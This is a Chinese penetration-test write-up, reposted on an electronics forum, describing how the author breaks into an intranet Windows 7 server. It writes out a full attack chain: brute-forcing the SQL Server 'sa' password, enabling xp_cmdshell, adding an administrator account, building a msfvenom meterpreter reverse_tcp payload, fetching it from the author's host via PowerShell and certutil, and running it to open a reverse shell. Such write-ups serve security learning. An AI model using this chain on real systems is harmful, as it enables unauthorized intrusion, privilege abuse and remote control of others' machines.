0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

记一次内网中反弹shell的艰难历程

jf_Fo0qk3ln 来源:先知社区 2023-03-07 09:30 次阅读

0x00 前言

最近在客户现场对内网服务器进行渗透测试,发现了大量的弱口令,本次历程就是从这里开始···

0x01 弱口令

对目标ip进行端口扫描,开放端口为80,445,1433,3389

访问80端口,只是一个安装成功的界面,扫描一下目录看是否有源码泄露,无果

使用nmap脚本对445端口进行扫描,看是否存在ms17010等漏洞,无果

使用超级弱口令工具爆破1433,爆破成功,账号密码:sa/sa

同时对3389端口进行爆破,无果

因此确定了突破口,使用navicat成功连接sql server数据库

0x02 连接3389

翻了一下,没什么数据,尝试拿服务器吧,因此直接新建查询,开启xp_cmdshell:


EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; 然后执行命令

exec master..xp_cmdshell "whoami"; 是system权限,和想象中的一样 3389是开着的,不如加个用户直接连接远程桌面吧

48f3e3ce-bc74-11ed-bfe3-dac502259ad0.png

加强密码强度,重新添加


exec master..xp_cmdshell "net user test paperpen123. /add"; exec master..xp_cmdshell "net localgroup administrators test /add"; 一切都很顺利,开始连接3389,但遗憾的是

4906afea-bc74-11ed-bfe3-dac502259ad0.png

是win7,只允许单用户登录,如果挤他的话被发现就不能继续玩耍了,还是放弃连接3389吧

0x03 powershell下载木马

我还是把shell弹到本地来吧,方便操作,但是说着简单,该怎么弹呢? 需要强调一点,这里的内网不可以访问外网,因此无法使用命令从外网下载工具 那么可以这样,让他从我的本地服务器下载工具到他的服务器上就可以了 但是要关闭本机防火墙,执行后访问失败才想起来。我的ip是195.1.7.23 使用kali生成exe木马


msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe 本地phpstudy快速搭建环境 将shell.exe放到网站根目录下,链接为http://195.1.7.23/shell.exe 本地监听8888端口

msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 195.1.7.23 LHOST => 195.1.7.23 msf5 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf5 exploit(multi/handler) > exploit 一切准备就绪,就差服务器执行shell.exe文件了。接下来的命令,大多是我朋友Calendula提供的,感谢一下 经测试,powershell是可以执行命令的,因此执行朋友Calendula给的下载命令

exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient"; exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')"; 这两句本可以合并到一起执行,但是前面尝试执行其他命令时发现有长度限制

4913e638-bc74-11ed-bfe3-dac502259ad0.png

所以拆分进行执行,但是遗憾的是

493592ce-bc74-11ed-bfe3-dac502259ad0.png

DownloadFile无法使用,具体因为什么也没搞清楚,因此放弃了这种方法

0x04 证书下载

朋友Calendula又给我提供了一种思路,使用certutil.exe,顿时惊呆、闻所未闻,命令如下:


exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"'; 使用dir查看,发现成功下载到了服务器上

494c47a8-bc74-11ed-bfe3-dac502259ad0.png

0x05 反弹成功

就差一步了,输入下面的命令并紧张地点击了执行


exec master..xp_cmdshell 'shell.exe'; 卡住了···,又执行了一遍,又卡住了···,又执行了一遍,什么情况··· 回到监听界面,打算按下ctrl+c重新监听,结果进了meterpreter界面,原来是它卡住了···

496332e2-bc74-11ed-bfe3-dac502259ad0.png

激动地截了张图

4975ed4c-bc74-11ed-bfe3-dac502259ad0.png

查看了一下是不是域环境

498efc2e-bc74-11ed-bfe3-dac502259ad0.png

没错是的,看来还有很长的路要走。。

0x06 结语

这次就写到这吧,如有进展,还会更新。欢迎各位师傅们留言讨论,互相交流,互相学习,共同进步。

审核编辑:汤梓红

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9138

    浏览量

    85366
  • 数据库
    +关注

    关注

    7

    文章

    3798

    浏览量

    64370
  • 端口
    +关注

    关注

    4

    文章

    964

    浏览量

    32064
  • Shell
    +关注

    关注

    1

    文章

    365

    浏览量

    23360
  • 脚本
    +关注

    关注

    1

    文章

    389

    浏览量

    14861

原文标题:实战 | 记一次内网中反弹shell的艰难历程

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    【freeRTOS开发笔记】一次坑爹的freeTOS升级

    【freeRTOS开发笔记】一次坑爹的freeTOS-v9.0.0升级到freeRTOS-v10.4.4
    的头像 发表于 07-11 09:15 4636次阅读
    【freeRTOS开发笔记】<b class='flag-5'>记</b><b class='flag-5'>一次</b>坑爹的freeTOS升级

    基于Go语言的反弹Shell命令生成工具简介

    RevShell 是个基于Go语言的反弹Shell命令生成工具,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。
    发表于 08-25 09:45 765次阅读
    基于Go语言的<b class='flag-5'>反弹</b><b class='flag-5'>Shell</b>命令生成工具简介

    STM32F429如何一次传3000个数据?

    正点原子的历程实用的是8位的数据传输,也就是说最多一次能传255个数据,我要是一次想传3000个数据,应该怎么更给程序?
    发表于 05-11 08:56

    使用HAProxy软件的一次学习过程介绍

    一次学习过程
    发表于 06-13 10:48

    一次网站设计稿的方法

    一次网站设计稿
    发表于 06-16 09:43

    一次呼叫典型流程

    一次呼叫典型流程:一次呼叫典型流程B.1 概述本章将分别给出主叫流程和被叫流程的例子,以示一次通话过程UTRAN的典型流程。B.2 主叫流程主叫流程是指UE呼叫其它用户
    发表于 11-28 17:57 26次下载

    一次电池为什么不能被充电?

    一次电池为什么不能被充电? 一次电池不能被充电再生是构成一次电池体系的本性所决定的,因为一次电池的电极反应不可逆,也就是说,放电后的放电产
    发表于 10-28 15:29 5853次阅读

    循环充放电一次就是少一次寿命吗?

    循环充放电一次就是少一次寿命吗?     循环就是使用,我们是在使用电池,关心的是使
    发表于 11-11 13:59 849次阅读

    电池循环充放电一次就是少一次寿命吗?

    电池循环充放电一次就是少一次寿命吗? 循环就是使用,我们是在使用电池,关心的是使用的时间,为了衡量充电电池
    发表于 09-06 11:05 3594次阅读

    PT柜为什么要安装一次消谐器

    PT柜可以安装一次消谐器,那么PT柜中定要安装一次消谐装置吗?
    发表于 07-22 15:44 3367次阅读

    一次CH552不识别无法下载解决办法

    一次CH552不识别解决办法插入链接与图片如何插入段漂亮的代码片生成个适合你的列表创建个表格设定内容居中、居左、居右SmartyPa
    发表于 01-12 19:15 5次下载
    <b class='flag-5'>记</b><b class='flag-5'>一次</b>CH552不识别无法下载解决办法

    电气一次识图基础

    电气一次识图基础
    的头像 发表于 11-12 11:24 2117次阅读

    一次消谐如何接线

    一次消谐如何接线 一次消谐器是种用于消除电力系统谐波的装置,通常需要与电容器和电抗器组合使用。在安装一次消谐器时,需要注意以下接线步骤:
    的头像 发表于 03-22 16:50 2106次阅读

    一次调频和二调频的概念 一次调频可以实现无差调节?

    一次调频和二调频的概念 一次调频可以实现无差调节? 一次调频和二调频的概念 1.
    的头像 发表于 10-17 16:15 9339次阅读

    基波是一次谐波么 基波与一次谐波的区别

    基波是一次谐波么 基波与一次谐波的区别  基波和一次谐波是两个不同的概念。 基波是在谐波分析中指的是频率最低且没有任何谐波成分的波形,它是构成复杂波形的基础。在正弦波,基波就是正弦波
    的头像 发表于 04-08 17:11 7514次阅读